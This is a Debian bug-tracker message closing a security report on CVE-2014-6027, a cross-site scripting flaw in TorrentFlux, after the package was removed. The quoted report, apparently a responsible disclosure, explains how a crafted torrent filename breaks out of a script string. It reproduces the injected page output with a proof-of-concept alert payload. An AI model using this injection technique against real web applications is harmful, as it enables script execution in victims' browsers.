Your message dated Wed, 10 Sep 2014 10:40:15 +0000
with message-id <e1xrfjv-00052m...@franck.debian.org>
and subject line Bug#761008: Removed package(s) from unstable
has caused the Debian Bug report #759574,
regarding torrentflux: CVE-2014-6027: XSS in TorrentFlux
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
759574: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=759574
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: torrentflux
Version: 2.4.5-1
The XSS that can be triggered by an unauthenticated attacker. A malicious
torrent file such as the POC attached can be crafted and shared by an
attacker. Upon starting the download from Torrentflux, some of the file
contents are pasted without output encoding into a script section,
triggering the XSS. An alternate vector (authenticated) is for an attacker
to upload the torrent file to his own account and subsequently share a link
the torrent's details (
<http://www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_201
3.12.torrent>
www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_2013.12.tor
rent).
</td></tr></table><br><div align="left" id="BodyLayer" name="BodyLayer"
style="border: thin solid #000000; position:relative; width:740; height:500;
padding-left: 5px; padding-right: 5px; z-index:1; overflow: scroll;
visibility: visible"><link rel="StyleSheet" href="dtree.css" type="text/css"
/><script type="text/javascript" src="dtree.js"></script><table><tr><tr><td
width="110">Metainfo
File:</td><td>pclinuxos_kde_2013.12.torrent</td></tr><tr><td>Directory
Name:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Announce URL:
<URL:%3c/td%3e%3ctd%3ehttp://linuxtracker.org:2710/0000000000000000000000000
0000000/announce%3c/td%3e%3c/tr%3e%3ctr%3e%3ctd>
</td><td>http://linuxtracker.org:2710/00000000000000000000000000000000/annou
nce</td></tr><tr><td
valign="top">Comment:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Created
:</td><td>December 4, 2013, 12:37 pm</td></tr><tr><td>Torrent
Size:</td><td>1698693120 (1.58 GB)</td></tr><tr><td>Chunk
size:</td><td>2097152 (2 MB)</td></tr><tr><td>Selected size:</td><td
id="sel">0</td></tr></table><br>
<form name="priority" action="index.php" method="POST" ><input type="hidden"
name="torrent" value="pclinuxos_kde_2013.12.torrent" ><input type="hidden"
name="setPriorityOnly" value="true" ><script type="text/javascript">
var sel = 0;
d = new dTree('d');
d.add(4,-1,"/",-1,0);
d.add(0,4,"kde-2013.12.jpg (78175)",-1,78175);
d.add(1,4,"pclinuxos-kde-2013.12.iso (1697839104)",-1,1697839104);
d.add(2,4,"pclinuxos-kde-2013.12.md5sum (60)",-1,60);
d.add(3,4,"X");alert('X');//pg (181733)",-1,181733);
document.write(d);
sel = getSizes();
drawSel();
Please find attached the full proof of concept torrent file.
--
Nicolas Guigo
Senior Security Engineer
iSEC Partners (NCC GROUP)
(206) 948-3687
9C80 28B2 F016 4DA4 24C9 D1D7 129C FDF6 0CDC B828
pclinuxos-kde-2013.12.torrent
Description: application/bittorrent
smime.p7s
Description: S/MIME cryptographic signature
--- End Message ---
--- Begin Message ---
Version: 2.4-5.1+rm
Dear submitter,
as the package torrentflux has just been removed from the Debian archive
unstable we hereby close the associated bug reports. We are sorry
that we couldn't deal with your issue properly.
For details on the removal, please see https://bugs.debian.org/761008
The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.
This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@ftp-master.debian.org.
Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)
--- End Message ---
